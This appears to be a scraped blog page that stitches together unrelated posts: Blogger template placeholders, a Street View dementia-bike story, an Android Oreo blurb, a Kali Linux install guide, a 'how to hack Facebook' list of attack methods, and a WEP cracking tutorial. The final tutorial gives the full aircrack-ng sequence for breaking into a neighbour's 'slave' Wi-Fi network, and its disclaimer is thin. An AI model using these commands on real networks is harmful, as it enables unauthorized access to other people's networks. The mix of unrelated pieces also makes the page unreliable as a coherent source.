This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

!--Start of Tawk.to Script-->

GOOGLE 🔍 STREET VIEW

In 2007, Google sent out the first fleet of cars armed with cameras to map the world. Who could have guessed that a decade later, a researcher would use Street View technology to help dementia patients remember.
But that’s exactly what biomechanical engineer Anne-Christine Hertz is doing.

Technology and the power of memory

Anne-Christine was trying to develop new methods to treat Alzheimer’s patients and those suffering from dementia. Specifically, she wanted to help them preserve old memories. Memory loss is one of the most traumatic side effects of dementia, both for patients and their loved ones.
To combat this, she built a prototype called BikeAround, which pairs a stationary bike with Google Street View to take dementia patients on a virtual ride down memory lane. Patients input a street address of a place that means something to them - a childhood home for instance - and then use the pedals and handlebars to “bike around” their old neighborhoods.

Why not just look through an old photo album?

Our strongest memories are intensely tied to location. It’s no coincidence that when you think about any big memory or past event, your first thought is often “Where was I when that happened?” BikeAround taps into this idea, by combining mental stimulation from surrounding the patient with places they recognize, and physical stimulation from pedaling and steering. Scientists think this pairing produces dopamine in the brain and has the potential to affect memory management in a profound way.

The road ahead

Anne Christine’s BikeAround invention is an inspiring example of what happens when you make technology available for everyone. The device is now undergoing further scientific study with the goal to bring it to facilities around the globe and improve the lives of dementia patients, one bike ride at a time. 

Android 8.0 Oreo Coming Soon …….. Published August 31, 2017 by Mehedi Shakeel 0 In 2017, Google will serve up the tasty-sounding Android Oreo. This latest update offers all kinds of great new features, as you’ll see in our Android Oreo overview. Notifications have been improved once again, while you can also look forward to a funky picture-in-picture video mode. This allows you to watch YouTube clips in a resizable box, while you’re playing around with other apps. Google has made plenty of additional improvements to the likes of audio quality and text input, as well as resource management. Share this: Click to share on Twitter (Opens in new window)Click to share on Facebook (Opens in new window)Click to share on Google+ (Opens in new window)Click to share on Reddit (Opens in new window)Click to share on Tumblr (Opens in new window)Click to email this to a friend (Opens in new window)

Intro
You're seeing this post probably because you want to install Kali Linux in your PC, if you don't you came here just to see what's this thing 'Kali Linux'... So it is a modified of Linux made for hackers... You can for example hack WPA/WPA2 (internet passwords). It's basically the perfect OS for the hackers, the 'Hackers' Paradise'.
Setup
- Virtual Machine (VMWare, VirtualBox)
- μTorrent/BitTorrent
Tutorial
Step 1 - Install VirtualBox. ATENTION: Install VirtualBox version 4.3.12 because the latest version (4.3.14) is having some problems with some antivirus... So i recommend you to download version 4.3.12.
Step 2 - Search on Google for Kali Linux and click in the first website (official one), select the Downloads tab and download the 'Kali Linux 32 bit ISO' with torrent not direct or it will take forever to download.
Step 3 - Now open up VirtualBox and click on 'New' (top left). Name it Kali Linux 1.0.8 (or whatever version you're using) it will automatically choose the type (Linux) and the version just change it to Debian (32 bits).
Step 4 - Hit the 'Next' button and choose the RAM you want to use in this OS I use 1 GB of RAM but i think 500 MB is enough...
Step 5 - Hit 'Next' again. Now choose 'Create a virtual hard drive now' option and click 'Create' choose VMDK option hit 'Next' once again and choose 'Dynamically allocated' and 'Next' again.
Step 6 - Right now choose the size of the compartition that you're going to use to make the Virtual Machine I choosed 30 GB but 20 GB is enough... And at the top you will choose the location of the compartition. Hit 'Create'.
Step 7 - Now that the partition is made you are going to click once in the partition you made and then hit 'Settings' at the top left. Click on System>Processor and check the box 'Enable PAEX/NX'. Now go to storage and in Controller: IDE you will find a little CD saying Empty. Now click at the little CD with an Add symbol and choose 'Choose Disk', now browse the ISO File you just downloaded (the Kali Linux ISO File), once you've done that click Ok.
Step 8 - Go to Network and where it says 'Attached to:' you choose 'Host-only Adapter'.
Step 9 - Now you can exit of the Setting Menu and start the Virtual Machine by clicking in the 'Start' button at the top left. Right now will appear a window where you have to make a choice, with the keyboard go down to the option 'Install' and hit Enter to continue.
Step 10 - It will now ask you for your country, language and the keyboard, just select the right information! Now Kali Linux will load. After that is complete it will ask you for the host name and domain name, it doesn't really matter just choose kalilinux for the hostname and kalilinux01 for the domainname. Now it will ask you for the Root Password type in 'toor' which is root written back, re-type it when it ask you do it. Now just select your Time Zone, after that it will load for a bit and then select the 'Partitioning method' as the 'Guide - use entire disk' now keep hitting Enter to choose the defaults and then just hit 'Finish partitioning and write changes to disk' after that it will ask you 'Write changes to disks?' and you hit 'Yes'. Now it will install the OS so it will take like 20-30 minutes.
Step 11 - Now it will ask you 'Use a network mirror?' and click yes, after that it will ask you for a HTTP Proxy Information and you just leave it empty. Now it will download some files from the network mirror.
Step 12 - After that is done it will ask you 'Install the GRUB boot loader to the master boot record?' and choose 'Yes', then finally it will say 'Installation Complete' hit 'Continue'.
Step 13 - Kali Linux will restart and after that a window will appear with the option 'Other...' click on it and it will ask you for username and password, so the username is 'root' and the password is 'toor'.
Step 14 - Kali Linux is installed but now we will update and upgrade... For that just go to: Applications (top left) >Acessories>Terminal, and a window like cmd will open write on it : apt-get update && apt-get -y upgrade && apt-get -y install dkms | Now be sure you wrote it correctly and then hit Enter. After the installation is complete write poweroff and the Virtual Machine will turn off.
Step 15 - Your Kali Linux is good to go so if you want to turn it on again the username is root and the password is toor.
Step 16 - Enjoy your Kali Linux 

HOW TO HACK FACEBOOK ACCOUNT

will show number of ways to Hack Facebook Account that all hackers usually use to hack Facebook Account. So beware from hackers and protect your facebook account from hackers. Our site provides only security tips to protect your facebook account from hackers . We sharing only these methods because if you know how to hack you must know how to secure. Must read carefully all these methods, beware from all attacks, and protect your facebook account from hackers.
Note :- This post is only for security purpose don't try any illigal activity and i'm just shared these methods because protect our facebook account from these types of hacking attacks.

Top Ways How Hackers Can Hack Facebook Accounts In 2016

Mostly Hackers use these methods to hack facebook account 2016, So protect yourself from hackers. Must Read this post, and beware from hackers
#1 Hack Facebook Account Password By Phishing
Phishing is still the most popular attack vector used for hacking Facebook accounts. There are variety methods to carry out phishing attack. In a simple phishing attacks a hacker creates a fake log in page which exactly looks like the real Facebook page and then asks the victim to log in. Once the victim log in through the fake page the, the victims "Email Address" and "Password" is stored in to a text file, and the hacker then downloads the text file and gets his hands on the victims credentials.
#2 Hack Facebook Account Password By Keylogging
Keylogging is the easiest way to hack a Facebook password. Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A Keylogger is basically a small program which, once is installed on victim's computer, will record every thing victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address.
#3 Stealer's
Almost 80% percent people use stored passwords in their browser to access the Facebook. This is quite convenient, but can sometimes be extremely dangerous. Stealer's are software's specially designed to capture the saved passwords stored in the victims Internet browser.
#4 Hack Facebook Account Password By Session Hijacking
Session Hijacking can be often very dangerous if you are accessing Facebook on a http (non secure) connection. In Session Hijacking attack, a hacker steals the victims browser cookie which is used to authenticate the user on a website, and use it to access the victims account. Session hijacking is widely used on LAN, and WiFi connections.
#5 Sidejacking With Firesheep
Sidejacking attack went common in late 2010, however it's still popular now a days. Firesheep is widely used to carry out sidejacking attacks. Firesheep only works when the attacker and victim is on the same WiFi network. A sidejacking attack is basically another name for http session hijacking, but it's more targeted towards WiFi users.
#6 Mobile Phone Hacking
Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victims mobile phone then he can probably gain access to his/her Facebook account. Their are a lots of Mobile Spying software's used to monitor a Cellphone. The most popular Mobile Phone Spying software's are: Mobile Spy, and Spy Phone Gold.
#7 DNS Spoofing
If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original Facebook page to his own fake page and hence can get access to victims Facebook account.
#8 USB Hacking
If an attacker has physical access to your computer, he could just insert a USB programmed with a function to automatically extract saved passwords in the Internet browser.
#9 Man In the Middle Attacks
If the victim and attacker are on the same LAN and on a switch based network, a hacker can place himself between the client and the server, or he could act as a default gateway and hence capturing all the traffic in between.
#10 Botnets
Botnets are not commonly used for hacking Facebook accounts, because of it's high setup costs. They are used to carry more advanced attacks. A Botnet is basically a collection of compromised computer. The infection process is same as the key logging, however a Botnet gives you additional options for carrying out attacks with the compromised computer. Some of the most popular Botnets include Spyeye and Zeus.
Mostly hackers use these methods to hack facebook account password, We are shared this ways/post only for security purpose.
NOTE: The Information contained in this Article is only Intended for Educational Purposes for checking the security of your network. I take no Responsibility for the misuse of this information and the harm brought to you or any one else (specially your neighbour.. :)
The Stuff that you are going to need is
(1) Backtrack (You can get it here)
(2) Wireless Card that Supports Packet Injection

Before we Start, I take it for Granted that you are aware of a Few things...

I Hope You already have a Live CD, Bootable USB or a Virtual Backtrack Installed in your System. In case of Virtual Machine, You will need an External Wireless Card. And in case you don't already have Backtrack, I suggest you bookmark this page and get it first.

Also, I hope you have googled by now to see if your Wireless Card will support Packet Injection or not. Again, if you haven't already done that go and get this done first :)

Now that we are Ready.. Lets Begin..

If You are Using a Boot CD, As in my case, You will see the folllowing screen when the CD Loads.
Just Select "Start BackTrack FrameBuffer (1024x768)"
or Select "Start BackTrack FrameBuffer (800x600)"
Depending On your Display Settings. These Options are to get to the GUI of Backtrack.

What will follow next is the Loading of all Drivers and Other Processes. Once they come to a halt. You will See a Cursor. Just Type in "startx".

Once, the Startup is Completed you will be at the Desktop of Backtrack

Now, We better get our Network Interfaces Started. While there are a few ways of Doing that. The simplest way is through the Menu.
Once, Network has been Started. We need to go Start a Konsole. Which we will be using to enter all commands to crack wep.

Once, inside the Konsole. Type in "iwconfig" to see the status of all the network interfaces of your Machine.

In My Case, My Wireless Interface is "wlan0". In your case, It can be any other or might just be wlan0. Remember, whatever your interface, replace my "wlan0" with it throughout the Tutorial now.

Now that we know the Interface, we better put it on monitoring mode. To do that, we need to type this command.
airmon-ng start wlan0

Press ENTER and You will see that monitor mode for your Wireless Interface will be enabled now. In my case, the monitor mode has been enabled at "mon0". This will be our new Interface now not "wlan0".
Now that the monitor mode has been enabled. We will scan our Area for any WEP Encrypted Wifi Networks. To do that we need to type the following command.
airodump-ng --encrypt wep mon0

What you will see Next will be A List of All the WEP Encrypted WIFI Networks around you. There are some details in there too. Here's a simple explanation of a few of them
BSSID = MAC Address of the slave (Most Important)
PWR = Signal Strength
CH = Channel Number
ENC = Encryption Type
ESSID= Name of slave's Network
#Data = Amount of IVS Collected (Most Important)
#/s = IVS Per Second
You Might just wanna copy the BSSID as it is going to be used a lot.

Our slave's Details
BSSID= 00:50:F1:12:12:10
CH = 1
ESSID= {censored}
Something, You might wanna know but is not useful for WEP is that the "STATION" are the Computers currently connected to the Network. As you can notice, My slave currently has a Computer connected to it.While STATION is important for WPA Hacking, It is not useful for WEP Hacking.

Now that we have our slave in Sight. It is now time to target our Interface on collecting packets from it. So, now we will make our airodump-ng more specific to target it on our slave's Network.
airodump-ng --bssid 00:50:F1:12:12:10 --channel 1 --encrypt wep --ivs --write wephack mon0

Once You hit ENTER. You will notice that now our Wireless Interface will only focus on Our slave's Network (In this case: 00:50:F1:12:12:10)
Now that we have targeted the slave's Network. It is time to Start gathering Packets from it. There are two ways for Doing it.
(1) Fragment Attack
(2) Arpreplay
Its your Lucky day..lol.. I will be going through both.

But before these attacks, we need to fool the Router into thinking that we are authenticated to receive data from it. To do this we will "fakeauth" the slave's Router.
aireplay-ng --fakeauth 0 -a 00:50:F1:12:12:10 mon0

Once, You hit ENTER you will see something Like this when the Attack is Successful.

02:29:07 Sending Authentication Request (Open System) [ACK]
02:29:07 Authentication successful
02:29:07 Sending Association Request [ACK]
02:29:07 Association Successful :-) (AID: 1)

Now that the Association is Successful. We will initiate the Process to collect Arps. First, We will try Arpreplay as it is a very simple attack. Here's the command.
aireplay-ng --arpreplay -b 00:50:F1:12:12:10 mon0

Once, You hit ENTER you will see something Like this. After a Few Seconds or Maybe a few minutes, You may see the number of arps rise. If that happens ARPREPLAY has been successful or else, We will have to move on to Fragment Attack.
OK. Since, Our Arpreplay has failed we will now initiate a Fragment attack. Here's the code
aireplay-ng --fragment -b 00:50:F1:12:12:10 mon0

Once, You hit ENTER. Out Network Interface will start to collect Packets from The slave's Router. When it asks you to use a particular packet. Just hit Y and press ENTER.

It will now try to capture 1500 bytes of Keystream. This keystream will be stored in a XOR file as in my case- fragment -0123-023217.xor We will later use this very captured keystream to forge it into a packet using packetforge-ng.
Basically, what we are going to do is use that keystream and make a valid packet out of it. Then we will use that packet to arpreplay our slave's Router. So, Lets make a packet then..
packetforge-ng --arp -a 00:50:F1:12:12:10 -h 11:22:33:44:55:66 -l 255.255.255.255 -k 255.255.255.255 -y fragment-0123-023217.xor -w wepfrag
OK. To keep this command simple let me just say this. Here, "-a" is the slave's MAC Address and "-h" is our MAC Address which I just entered for namesake. Let the rest of the things be the same. For those extra Information Seekers.. You can pm me or just google it.

Just hit ENTER and there we go, the Packet has been made.
Now, We will use this packet to arp attack the slave's Router. Here's the Command.
aireplay-ng --arpreplay -r wepfrag -b 00:50:F1:12:12:10 mon0

Just hit ENTER and the Mag!c Finally begins...

Now, Its Time to Play Wait & Watch... Just Wait till the #Data Table reaches 30000 or close...
Once, You have enough #Data Packets. It is time to Initiate the Final Kill. aircrack. Here's the command.
aircrack-ng wephack-01.ivs

Hit a Final ENTER and See the Process.. Will take a few Seconds or Minutes.. depending on the Password....

And Voila... Here it is....